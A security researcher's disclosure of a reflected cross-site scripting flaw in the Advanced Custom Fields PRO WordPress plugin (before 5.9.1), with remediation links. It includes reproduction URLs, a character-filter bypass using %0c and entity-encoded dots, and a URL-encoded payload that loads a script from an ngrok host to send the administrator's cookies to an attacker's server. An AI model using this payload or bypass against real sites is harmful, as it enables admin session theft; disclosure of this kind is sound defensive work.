WordPress allows reflected cross-site scripting in the resource edit.php, because the update page of the Advanced Custom Fields PRO plugin (versions before 5.9.1) enables injection of JavaScript code.
Steps to reproduce the vulnerability
Add the XSS payload at the end of the URL, like so:
https://SiteWithWordpress/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>
However, after trying some payloads I saw that the [space] character is replaced in the response with the underscore character [ _ ], and the same goes for the dot character [ . ], so it is not possible to inject useful payloads to extract, for example, the session cookie.

I found a way to bypass this problem: in the request, replace the [space] character with [%0c] and the dot character [ . ] with its HTML-encoded equivalent; this content is rendered successfully because the response is an HTML page.
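As an added illustration (not code from this report or from the ACF plugin), the following Python model contrasts the space/dot rewriting described above with proper attribute-context encoding, showing why the first passes a form-feed separated tag and entity-encoded dots while the second does not; the echoing page, the query strings and the host example.invalid are constructed assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed model of the filtering the report describes: the reflected value
# has space and dot rewritten to "_", and nothing else is escaped.
def naive_filter(value: str) -> str:
    return value.replace(" ", "_").replace(".", "_")

# Correct treatment for a value reflected inside a double-quoted HTML attribute:
# every character that can close the attribute or open a tag is entity-encoded,
# and a literal "&" is encoded too, so entity sequences in the input stay inert.
def attribute_escape(value: str) -> str:
    return html.escape(value, quote=True)

def render_page(query_string: str, escaper) -> str:
    """Hypothetical page that echoes the URL-decoded query string into an href."""
    return '<a href="edit.php?%s">Updates</a>' % escaper(unquote(query_string))

# "<script" only opens a script element when the tag name is followed by
# whitespace (form feed \x0c counts) or ">"; "<script_src" is an unknown tag.
SCRIPT_TAG = re.compile(r"<script(?=[\s>])", re.IGNORECASE)

def is_script_breakout(rendered: str) -> bool:
    """True if a real <script> element survived into the rendered markup."""
    return SCRIPT_TAG.search(rendered) is not None

# Constructed inputs. PLAIN_QS uses "%20" (space) and literal dots;
# BYPASS_QS uses "%0c" for the space and "&#x2e;" for the dots, as in the report.
BASE = "post_type=acf-field-group&page=acf-settings-updates&"
PLAIN_QS = BASE + "%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fexample.invalid%2Fa.js%22%3E%3C%2Fscript%3E"
BYPASS_QS = BASE + "%22%3E%3Cscript%0csrc%3D%22https%3A%2F%2Fexample%26%23x2e%3Binvalid%2Fa%26%23x2e%3Bjs%22%3E%3C%2Fscript%3E"

def compare() -> dict:
    """Whether a script element is injected for each filter/input pairing."""
    return {
        "naive/plain": is_script_breakout(render_page(PLAIN_QS, naive_filter)),
        "naive/bypass": is_script_breakout(render_page(BYPASS_QS, naive_filter)),
        "escape/bypass": is_script_breakout(render_page(BYPASS_QS, attribute_escape)),
    }

if __name__ == "__main__":
    for case, injected in compare().items():
        print(f"{case:14} script injected: {injected}")
```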

Now it is time to make the script that sends the administrator user's cookies to the hacker's evil server, for example:

Of course, the payload that calls the previous script must first be URL-encoded, so: https://WordPressDomain/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"XSS%22%3e%3c%73%63%72%69%70%74%0c%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%32%65%32%30%30%32%66%39%26%23%78%32%65%3b%6e%67%72%6f%6b%26%23%78%32%65%3b%69%6f%2f%72%65%71%75%65%73%74%26%23%78%32%65%3b%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e

Send the payload and you will see two requests: the first makes a promise for sending the cookies and the second is where the promise is executed.

Now the hacker has the administrator user's cookies on the evil server.

Remediation
I exchanged messages with the dev team of Advanced Custom Fields; they fixed the vulnerability in version 5.9.1 of ACF PRO. Here is the report:
https://www.advancedcustomfields.com/blog/acf-5-9-1-release/
https://wpscan.com/vulnerability/d1e9c995-37bd-4952-b88e-945e02e3c83f
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24241